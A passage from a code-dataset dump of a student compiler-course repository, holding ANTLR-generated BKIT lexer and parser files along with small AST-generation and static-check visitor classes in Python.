\"SEMI\", \"COMMA\", \n \"ASSIGN\" ]\n\n ruleNames = [ \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \n \"DIGIT\", \"LETTER\", \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \n \"ILL_ESC_SEQUENCE\", \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \n \"STRING_CHAR\", \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \n \"DECIMAL\", \"OCTAL\", \"Integer_literal\", \"Float_literal\", \n \"String_literal\", \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \n \"MINUS_INT\", \"STAR_INT\", \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):\n if self._actions is None:\n actions = dict()\n actions[2] = self.UNCLOSE_STRING_action \n actions[25] = self.String_literal_action \n self._actions = actions\n action = self._actions.get(ruleIndex, None)\n if action is not None:\n action(localctx, actionIndex)\n else:\n raise Exception(\"No registered action for:\" + str(ruleIndex))\n\n\n def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 0:\n\n y = str(self.text);\n self.text = y[1:]\n \n \n\n def String_literal_action(self, localctx:RuleContext , actionIndex:int):\n if actionIndex == 1:\n\n y = str(self.text)\n self.text = y[1:-1]\n \n \n\n\n" }, { "alpha_fraction": 0.682758629322052, "alphanum_fraction": 0.692307710647583, "avg_line_length": 38.29166793823242, "blob_id": "4bfb930c768ca82a850cf767feedf66557c684dc", "content_id": "9760ae2e5a1646d1c1be2d4e8e8130d2e19195f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1885, "license_type": "no_license", "max_line_length": 100, "num_lines": 48, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return self.visitVardecls(ctx.vardecls()) + 1 if ctx.vardecls() else 1\n\n# def visitVardecls(self,ctx:MPParser.VardeclsContext):\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) + 1\n\n# def visitVardecltail(self,ctx:MPParser.VardecltailContext): \n# if ctx.vardecl() and ctx.vardecltail():\n# return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) + 1\n# return 1\n\n# def visitVardecl(self,ctx:MPParser.VardeclContext): \n# return self.visitIds(ctx.ids()) + self.visitMptype(ctx.mptype()) + 1\n\n# def visitMptype(self,ctx:MPParser.MptypeContext):\n# return 1\n\n# def visitIds(self,ctx:MPParser.IdsContext):\n# return 1 + self.visitIds(ctx.ids()) if ctx.ids() else 1\n\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n return self.visitVardecls(ctx.vardecls()) + 1 if ctx.vardecls() else 1\n\n def visitVardecls(self,ctx:BKITParser.VardeclsContext):\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) + 1\n\n def visitVardecltail(self,ctx:BKITParser.VardecltailContext): \n if ctx.vardecl() and ctx.vardecltail():\n return self.visitVardecl(ctx.vardecl()) + self.visitVardecltail(ctx.vardecltail()) + 1\n return 1\n\n def visitVardecl(self,ctx:BKITParser.VardeclContext):\n return self.visitIds(ctx.ids()) + self.visitMptype(ctx.mptype()) + 1\n\n def visitMptype(self,ctx:BKITParser.MptypeContext):\n return 1\n\n def visitIds(self,ctx:BKITParser.IdsContext):\n return 1 + self.visitIds(ctx.ids()) if ctx.ids() else 1" }, { "alpha_fraction": 0.4738195836544037, "alphanum_fraction": 0.5107477307319641, "avg_line_length": 29.723163604736328, "blob_id": "5ffe58e1137966d8003f93484276b8e6465b31f6", "content_id": "53b87ea7d02652caa04a9a3475d49fd0c7fba257", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5443, "license_type": "no_license", "max_line_length": 103, "num_lines": 177, "path": "/LexicalAnalysis/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3E\")\n buf.write(\"\\7\\4\\2\\t\\2\\3\\2\\3\\2\\3\\2\\2\\2\\3\\2\\2\\2\\2\\5\\2\\4\\3\\2\\2\\2\\4\\5\")\n buf.write(\"\\3\\2\\2\\2\\5\\3\\3\\2\\2\\2\\2\")\n return buf.getvalue()\n\n\nclass BKITParser ( Parser ):\n\n grammarFileName = \"BKIT.g4\"\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n sharedContextCache = PredictionContextCache()\n\n literalNames = [ \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \"<INVALID>\", \n \"<INVALID>\", \"<INVALID>\", \"'Body'\", \"'Break'\", \"'Continue'\", \n \"'Do'\", \"'Else'\", \"'ElSelf'\", \"'ElseIf'\", \"'EndIf'\", \n \"'EndFor'\", \"'EndWhile'\", \"'For'\", \"'Function'\", \"'If'\", \n \"'Parameter'\", \"'Return'\", \"'Then'\", \"'Var'\", \"'While'\", \n \"'True'\", \"'False'\", \"'EndDo'\", \"'+'\", \"'+.'\", \"'-'\", \n \"'-.'\", \"'*'\", \"'*.'\", \"'\\\\'\", \"'\\\\.'\", \"'%'\", \"'!'\", \n \"'&&'\", \"'||'\", \"'=='\", \"'!='\", \"'<'\", \"'>'\", \"'<='\", \n \"'>='\", \"'=\\\\='\", \"'<.'\", \"'>.'\", \"'<=.'\", \"'>=.'\", \n \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \"'}'\", \"':'\", \"'.'\", \n \"';'\", \"','\" ]\n\n symbolicNames = [ \"<INVALID>\", \"REAL_NUMBER\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \n \"ERROR_CHAR\", \"WS\", \"Literal\", \"Integer_literal\", \n \"Float_literal\", \"Boolean_literal\", \"String_literal\", \n \"BODY\", \"BREAK\", \"CONTINUE\", \"DO\", \"ELSE\", \"ELSELF\", \n \"ELSEIF\", \"ENDBODY\", \"ENDFOR\", \"ENDWHILE\", \"FOR\", \n \"FUNCTION\", \"IF\", \"PARAMETER\", \"RETURN\", \"THEN\", \"VAR\", \n \"WHILE\", \"TRUE\", \"FALSE\", \"ENDDO\", \"PLUS_INT\", \"PLUS_FLOAT\", \n \"MINUS_INT\", \"MINUS_FLOAT\", \"STAR_INT\", \"STAR_FLOAT\", \n \"DIV_INT\", \"DIV_FLOAT\", \"MOD\", \"NOT\", \"AND\", \"OR\", \n \"EQUAL\", \"NOT_EQUAL_INT\", \"LESS_INT\", \"GREATER_INT\", \n \"LESS_OR_EQUAL_INT\", \"GREATER_OR_EQUAL_INT\", \"NOT_EQUAL_FLOAT\", \n \"LESS_FLOAT\", \"GREATER_FLOAT\", \"LESS_OR_EQUAL_FLOAT\", \n \"GREATER_OR_EQUAL_FLOAT\", \"LEFT_PAREN\", \"RIGHT_PARENT\", \n \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \n \"COLON\", \"DOT\", \"SEMI\", \"COMMA\" ]\n\n RULE_program = 0\n\n ruleNames = [ \"program\" ]\n\n EOF = Token.EOF\n REAL_NUMBER=1\n ID=2\n ILLEGAL_ESCAPE=3\n UNCLOSE_STRING=4\n COMMENT=5\n UNTERMINATED_COMMENT=6\n ERROR_CHAR=7\n WS=8\n Literal=9\n Integer_literal=10\n Float_literal=11\n Boolean_literal=12\n String_literal=13\n BODY=14\n BREAK=15\n CONTINUE=16\n DO=17\n ELSE=18\n ELSELF=19\n ELSEIF=20\n ENDBODY=21\n ENDFOR=22\n ENDWHILE=23\n FOR=24\n FUNCTION=25\n IF=26\n PARAMETER=27\n RETURN=28\n THEN=29\n VAR=30\n WHILE=31\n TRUE=32\n FALSE=33\n ENDDO=34\n PLUS_INT=35\n PLUS_FLOAT=36\n MINUS_INT=37\n MINUS_FLOAT=38\n STAR_INT=39\n STAR_FLOAT=40\n DIV_INT=41\n DIV_FLOAT=42\n MOD=43\n NOT=44\n AND=45\n OR=46\n EQUAL=47\n NOT_EQUAL_INT=48\n LESS_INT=49\n GREATER_INT=50\n LESS_OR_EQUAL_INT=51\n GREATER_OR_EQUAL_INT=52\n NOT_EQUAL_FLOAT=53\n LESS_FLOAT=54\n GREATER_FLOAT=55\n LESS_OR_EQUAL_FLOAT=56\n GREATER_OR_EQUAL_FLOAT=57\n LEFT_PAREN=58\n RIGHT_PARENT=59\n LEFT_BRACKET=60\n RIGHT_BRACKET=61\n LEFT_BRACE=62\n RIGHT_BRACE=63\n COLON=64\n DOT=65\n SEMI=66\n COMMA=67\n\n def __init__(self, input:TokenStream, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)\n self._predicates = None\n\n\n\n\n class ProgramContext(ParserRuleContext):\n\n def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):\n super().__init__(parent, invokingState)\n self.parser = parser\n\n\n def getRuleIndex(self):\n return BKITParser.RULE_program\n\n def enterRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"enterProgram\" ):\n listener.enterProgram(self)\n\n def exitRule(self, listener:ParseTreeListener):\n if hasattr( listener, \"exitProgram\" ):\n listener.exitProgram(self)\n\n\n\n\n def program(self):\n\n localctx = BKITParser.ProgramContext(self, self._ctx, self.state)\n self.enterRule(localctx, 0, self.RULE_program)\n try:\n self.enterOuterAlt(localctx, 1)\n\n except RecognitionException as re:\n localctx.exception = re\n self._errHandler.reportError(self, re)\n self._errHandler.recover(self, re)\n finally:\n self.exitRule()\n return localctx\n\n\n\n\n\n" }, { "alpha_fraction": 0.6632016897201538, "alphanum_fraction": 0.6632016897201538, "avg_line_length": 35.871795654296875, "blob_id": "50dfc0515d91dbecf1d8bcdecbcf0c27491b5847", "content_id": "8104107e2c59289c53f1360ff764494f2cc3bee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1443, "license_type": "no_license", "max_line_length": 114, "num_lines": 39, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration4.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return Program(list(map(lambda var_decl: self.visitVardecl(var_decl), ctx.var_decl())))\n\n# def visitVardecl(self,ctx:MPParser.VardeclContext): \n# var_type = self.visitMptype(ctx.mptype())\n# return list(map(lambda x: VarDecl(x, var_type), self.visitIds(ctx.ids())))\n\n# def visitMptype(self,ctx:MPParser.MptypeContext):\n# if ctx.INTTYPE():\n# return IntType()\n# return FloatType()\n\n# def visitIds(self,ctx:MPParser.IdsContext):\n# return list(map(lambda x: Id(x.getText()), ctx.ID()))\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n from functools import reduce\n return Program(list(reduce(lambda prog, var_decl: prog + self.visitVardecl(var_decl), ctx.vardecl(), [])))\n\n def visitVardecl(self,ctx:BKITParser.VardeclContext): \n var_type = self.visitMptype(ctx.mptype())\n return list(map(lambda x: VarDecl(x, var_type), self.visitIds(ctx.ids())))\n\n def visitMptype(self,ctx:BKITParser.MptypeContext):\n if ctx.INTTYPE():\n return IntType()\n return FloatType()\n\n def visitIds(self,ctx:BKITParser.IdsContext):\n return list(map(lambda x: Id(x.getText()), ctx.ID()))\n \n" }, { "alpha_fraction": 0.6707482933998108, "alphanum_fraction": 0.6707482933998108, "avg_line_length": 31, "blob_id": "8876daf4856122e240ed14308155f2043200c548", "content_id": "23682dd08a2bf39347ed921a289683fc4dee5b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 735, "license_type": "no_license", "max_line_length": 129, "num_lines": 23, "path": "/name_binding/ques1.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class StaticCheck(Visitor):\n \n def visitProgram(self,ctx:Program,o:object):\n from functools import reduce\n reduce(lambda lst, x: self.visitVarDecl(x, lst) if isinstance(x, VarDecl) else self.visitConstDecl(x, lst), ctx.decl ,[])\n\n def visitVarDecl(self,ctx:VarDecl,o:object):\n if ctx.name not in o:\n raise RedeclaredDeclaration(ctx.name)\n return ctx.name\n \n\n def visitConstDecl(self,ctx:ConstDecl,o:object):\n if ctx.name not in o:\n raise RedeclaredDeclaration(ctx.name)\n return ctx.name\n\n\n def visitIntType(self,ctx:IntType,o:object): pass\n\n def visitFloatType(self,ctx:FloatType,o:object):pass\n\n def visitIntLit(self,ctx:IntLit,o:object):pass" }, { "alpha_fraction": 0.29786643385887146, "alphanum_fraction": 0.5583660006523132, "avg_line_length": 57.15207290649414, "blob_id": "113da2073873aa8f85494a803c84673dfb5ca8e6", "content_id": "1384476cf95f097b7f6e77429206b97724fbfa29", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 25263, "license_type": "no_license", "max_line_length": 112, "num_lines": 434, "path": "/SyntaxAnalysis/src/main/bkit/parser/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/SyntaxAnalysis/src/main/bkit/parser/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\nfrom lexererr import *\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2E\")\n buf.write(\"\\u022b\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\3\\2\\3\\3\\3\\3\\3\\3\\7\\3\\u00b1\\n\\3\\f\\3\\16\\3\\u00b4\")\n buf.write(\"\\13\\3\\3\\4\\3\\4\\7\\4\\u00b8\\n\\4\\f\\4\\16\\4\\u00bb\\13\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\5\\3\\5\\7\\5\\u00c1\\n\\5\\f\\5\\16\\5\\u00c4\\13\\5\\3\\5\\5\\5\\u00c7\")\n buf.write(\"\\n\\5\\3\\5\\3\\5\\3\\6\\3\\6\\3\\6\\3\\6\\7\\6\\u00cf\\n\\6\\f\\6\\16\\6\\u00d2\")\n buf.write(\"\\13\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\6\\3\\7\\3\\7\\3\\7\\3\\7\\7\\7\\u00dd\\n\")\n buf.write(\"\\7\\f\\7\\16\\7\\u00e0\\13\\7\\3\\7\\3\\7\\3\\b\\3\\b\\3\\t\\6\\t\\u00e7\\n\")\n buf.write(\"\\t\\r\\t\\16\\t\\u00e8\\3\\t\\3\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\\f\\3\\f\\3\")\n buf.write(\"\\r\\3\\r\\5\\r\\u00f5\\n\\r\\3\\16\\3\\16\\5\\16\\u00f9\\n\\16\\3\\16\\6\")\n buf.write(\"\\16\\u00fc\\n\\16\\r\\16\\16\\16\\u00fd\\3\\17\\3\\17\\7\\17\\u0102\\n\")\n buf.write(\"\\17\\f\\17\\16\\17\\u0105\\13\\17\\3\\20\\6\\20\\u0108\\n\\20\\r\\20\\16\")\n buf.write(\"\\20\\u0109\\3\\20\\3\\20\\5\\20\\u010e\\n\\20\\3\\20\\5\\20\\u0111\\n\")\n buf.write(\"\\20\\3\\21\\3\\21\\3\\21\\3\\22\\3\\22\\3\\22\\3\\23\\3\\23\\3\\23\\3\\24\")\n buf.write(\"\\3\\24\\3\\24\\5\\24\\u011f\\n\\24\\3\\25\\3\\25\\3\\26\\3\\26\\3\\27\\3\")\n buf.write(\"\\27\\3\\27\\3\\27\\5\\27\\u0129\\n\\27\\3\\27\\6\\27\\u012c\\n\\27\\r\\27\")\n buf.write(\"\\16\\27\\u012d\\3\\30\\6\\30\\u0131\\n\\30\\r\\30\\16\\30\\u0132\\3\\31\")\n buf.write(\"\\3\\31\\3\\31\\3\\31\\5\\31\\u0139\\n\\31\\3\\31\\6\\31\\u013c\\n\\31\\r\")\n buf.write(\"\\31\\16\\31\\u013d\\3\\32\\3\\32\\3\\32\\5\\32\\u0143\\n\\32\\3\\33\\3\")\n buf.write(\"\\33\\3\\34\\3\\34\\5\\34\\u0149\\n\\34\\3\\35\\3\\35\\7\\35\\u014d\\n\\35\")\n buf.write(\"\\f\\35\\16\\35\\u0150\\13\\35\\3\\35\\3\\35\\3\\35\\3\\36\\3\\36\\3\\36\")\n buf.write(\"\\3\\36\\3\\36\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3\\37\\3 \\3 \\3 \\3 \\3\")\n buf.write(\" \\3 \\3 \\3 \\3 \\3!\\3!\\3!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3#\\3#\\3#\\3\")\n buf.write(\"#\\3#\\3#\\3#\\3$\\3$\\3$\\3$\\3$\\3$\\3$\\3%\\3%\\3%\\3%\\3%\\3%\\3&\\3\")\n buf.write(\"&\\3&\\3&\\3&\\3&\\3&\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\\'\\3\")\n buf.write(\"(\\3(\\3(\\3(\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3)\\3*\\3*\\3*\\3+\\3+\\3\")\n buf.write(\"+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3,\\3,\\3,\\3,\\3,\\3,\\3,\\3-\\3-\\3-\\3\")\n buf.write(\"-\\3-\\3.\\3.\\3.\\3.\\3/\\3/\\3/\\3/\\3/\\3/\\3\\60\\3\\60\\3\\60\\3\\60\")\n buf.write(\"\\3\\60\\3\\61\\3\\61\\3\\61\\3\\61\\3\\61\\3\\61\\3\\62\\3\\62\\3\\62\\3\\62\")\n buf.write(\"\\3\\62\\3\\62\\3\\63\\3\\63\\3\\64\\3\\64\\3\\64\\3\\65\\3\\65\\3\\66\\3\\66\")\n buf.write(\"\\3\\66\\3\\67\\3\\67\\38\\38\\38\\39\\39\\3:\\3:\\3:\\3;\\3;\\3<\\3<\\3\")\n buf.write(\"=\\3=\\3=\\3>\\3>\\3>\\3?\\3?\\3?\\3@\\3@\\3@\\3A\\3A\\3B\\3B\\3C\\3C\\3\")\n buf.write(\"C\\3D\\3D\\3D\\3E\\3E\\3E\\3E\\3F\\3F\\3F\\3G\\3G\\3G\\3H\\3H\\3H\\3H\\3\")\n buf.write(\"I\\3I\\3I\\3I\\3J\\3J\\3K\\3K\\3L\\3L\\3M\\3M\\3N\\3N\\3O\\3O\\3P\\3P\\3\")\n buf.write(\"Q\\3Q\\3R\\3R\\3S\\3S\\3T\\3T\\4\\u00d0\\u00de\\2U\\3\\3\\5\\4\\7\\5\\t\")\n buf.write(\"\\6\\13\\7\\r\\b\\17\\t\\21\\n\\23\\2\\25\\2\\27\\2\\31\\2\\33\\2\\35\\2\\37\")\n buf.write(\"\\2!\\2#\\2%\\2\\'\\2)\\2+\\2-\\2/\\2\\61\\2\\63\\13\\65\\f\\67\\r9\\16;\")\n buf.write(\"\\17=\\20?\\21A\\22C\\23E\\24G\\25I\\26K\\27M\\30O\\31Q\\32S\\33U\\34\")\n buf.write(\"W\\35Y\\36[\\37] _!a\\\"c#e$g%i&k\\'m(o)q*s+u,w-y.{/}\\60\\177\")\n buf.write(\"\\61\\u0081\\62\\u0083\\63\\u0085\\64\\u0087\\65\\u0089\\66\\u008b\")\n buf.write(\"\\67\\u008d8\\u008f9\\u0091:\\u0093;\\u0095<\\u0097=\\u0099>\\u009b\")\n buf.write(\"?\\u009d@\\u009fA\\u00a1B\\u00a3C\\u00a5D\\u00a7E\\3\\2\\16\\4\\3\")\n buf.write(\"\\n\\f\\16\\17\\4\\2\\60\\60AA\\5\\2\\13\\f\\16\\17\\\"\\\"\\3\\2c|\\3\\2C\\\\\")\n buf.write(\"\\3\\2\\62;\\4\\2GGgg\\3\\2\\60\\60\\t\\2))^^ddhhppttvv\\7\\2\\n\\f\\16\")\n buf.write(\"\\17$$))^^\\5\\2\\62;CHch\\3\\2\\629\\2\\u0233\\2\\3\\3\\2\\2\\2\\2\\5\")\n buf.write(\"\\3\\2\\2\\2\\2\\7\\3\\2\\2\\2\\2\\t\\3\\2\\2\\2\\2\\13\\3\\2\\2\\2\\2\\r\\3\\2\")\n buf.write(\"\\2\\2\\2\\17\\3\\2\\2\\2\\2\\21\\3\\2\\2\\2\\2\\63\\3\\2\\2\\2\\2\\65\\3\\2\\2\")\n buf.write(\"\\2\\2\\67\\3\\2\\2\\2\\29\\3\\2\\2\\2\\2;\\3\\2\\2\\2\\2=\\3\\2\\2\\2\\2?\\3\")\n buf.write(\"\\2\\2\\2\\2A\\3\\2\\2\\2\\2C\\3\\2\\2\\2\\2E\\3\\2\\2\\2\\2G\\3\\2\\2\\2\\2I\")\n buf.write(\"\\3\\2\\2\\2\\2K\\3\\2\\2\\2\\2M\\3\\2\\2\\2\\2O\\3\\2\\2\\2\\2Q\\3\\2\\2\\2\\2\")\n buf.write(\"S\\3\\2\\2\\2\\2U\\3\\2\\2\\2\\2W\\3\\2\\2\\2\\2Y\\3\\2\\2\\2\\2[\\3\\2\\2\\2\")\n buf.write(\"\\2]\\3\\2\\2\\2\\2_\\3\\2\\2\\2\\2a\\3\\2\\2\\2\\2c\\3\\2\\2\\2\\2e\\3\\2\\2\")\n buf.write(\"\\2\\2g\\3\\2\\2\\2\\2i\\3\\2\\2\\2\\2k\\3\\2\\2\\2\\2m\\3\\2\\2\\2\\2o\\3\\2\")\n buf.write(\"\\2\\2\\2q\\3\\2\\2\\2\\2s\\3\\2\\2\\2\\2u\\3\\2\\2\\2\\2w\\3\\2\\2\\2\\2y\\3\")\n buf.write(\"\\2\\2\\2\\2{\\3\\2\\2\\2\\2}\\3\\2\\2\\2\\2\\177\\3\\2\\2\\2\\2\\u0081\\3\\2\")\n buf.write(\"\\2\\2\\2\\u0083\\3\\2\\2\\2\\2\\u0085\\3\\2\\2\\2\\2\\u0087\\3\\2\\2\\2\\2\")\n buf.write(\"\\u0089\\3\\2\\2\\2\\2\\u008b\\3\\2\\2\\2\\2\\u008d\\3\\2\\2\\2\\2\\u008f\")\n buf.write(\"\\3\\2\\2\\2\\2\\u0091\\3\\2\\2\\2\\2\\u0093\\3\\2\\2\\2\\2\\u0095\\3\\2\\2\")\n buf.write(\"\\2\\2\\u0097\\3\\2\\2\\2\\2\\u0099\\3\\2\\2\\2\\2\\u009b\\3\\2\\2\\2\\2\\u009d\")\n buf.write(\"\\3\\2\\2\\2\\2\\u009f\\3\\2\\2\\2\\2\\u00a1\\3\\2\\2\\2\\2\\u00a3\\3\\2\\2\")\n buf.write(\"\\2\\2\\u00a5\\3\\2\\2\\2\\2\\u00a7\\3\\2\\2\\2\\3\\u00a9\\3\\2\\2\\2\\5\\u00ad\")\n buf.write(\"\\3\\2\\2\\2\\7\\u00b5\\3\\2\\2\\2\\t\\u00be\\3\\2\\2\\2\\13\\u00ca\\3\\2\")\n buf.write(\"\\2\\2\\r\\u00d8\\3\\2\\2\\2\\17\\u00e3\\3\\2\\2\\2\\21\\u00e6\\3\\2\\2\\2\")\n buf.write(\"\\23\\u00ec\\3\\2\\2\\2\\25\\u00ee\\3\\2\\2\\2\\27\\u00f0\\3\\2\\2\\2\\31\")\n buf.write(\"\\u00f4\\3\\2\\2\\2\\33\\u00f6\\3\\2\\2\\2\\35\\u00ff\\3\\2\\2\\2\\37\\u0107\")\n buf.write(\"\\3\\2\\2\\2!\\u0112\\3\\2\\2\\2#\\u0115\\3\\2\\2\\2%\\u0118\\3\\2\\2\\2\")\n buf.write(\"\\'\\u011e\\3\\2\\2\\2)\\u0120\\3\\2\\2\\2+\\u0122\\3\\2\\2\\2-\\u0128\")\n buf.write(\"\\3\\2\\2\\2/\\u0130\\3\\2\\2\\2\\61\\u0138\\3\\2\\2\\2\\63\\u0142\\3\\2\")\n buf.write(\"\\2\\2\\65\\u0144\\3\\2\\2\\2\\67\\u0148\\3\\2\\2\\29\\u014a\\3\\2\\2\\2\")\n buf.write(\";\\u0154\\3\\2\\2\\2=\\u0159\\3\\2\\2\\2?\\u015f\\3\\2\\2\\2A\\u0168\\3\")\n buf.write(\"\\2\\2\\2C\\u016b\\3\\2\\2\\2E\\u0170\\3\\2\\2\\2G\\u0177\\3\\2\\2\\2I\\u017e\")\n buf.write(\"\\3\\2\\2\\2K\\u0184\\3\\2\\2\\2M\\u018b\\3\\2\\2\\2O\\u0194\\3\\2\\2\\2\")\n buf.write(\"Q\\u0198\\3\\2\\2\\2S\\u01a1\\3\\2\\2\\2U\\u01a4\\3\\2\\2\\2W\\u01ae\\3\")\n buf.write(\"\\2\\2\\2Y\\u01b5\\3\\2\\2\\2[\\u01ba\\3\\2\\2\\2]\\u01be\\3\\2\\2\\2_\\u01c4\")\n buf.write(\"\\3\\2\\2\\2a\\u01c9\\3\\2\\2\\2c\\u01cf\\3\\2\\2\\2e\\u01d5\\3\\2\\2\\2\")\n buf.write(\"g\\u01d7\\3\\2\\2\\2i\\u01da\\3\\2\\2\\2k\\u01dc\\3\\2\\2\\2m\\u01df\\3\")\n buf.write(\"\\2\\2\\2o\\u01e1\\3\\2\\2\\2q\\u01e4\\3\\2\\2\\2s\\u01e6\\3\\2\\2\\2u\\u01e9\")\n buf.write(\"\\3\\2\\2\\2w\\u01eb\\3\\2\\2\\2y\\u01ed\\3\\2\\2\\2{\\u01f0\\3\\2\\2\\2\")\n buf.write(\"}\\u01f3\\3\\2\\2\\2\\177\\u01f6\\3\\2\\2\\2\\u0081\\u01f9\\3\\2\\2\\2\")\n 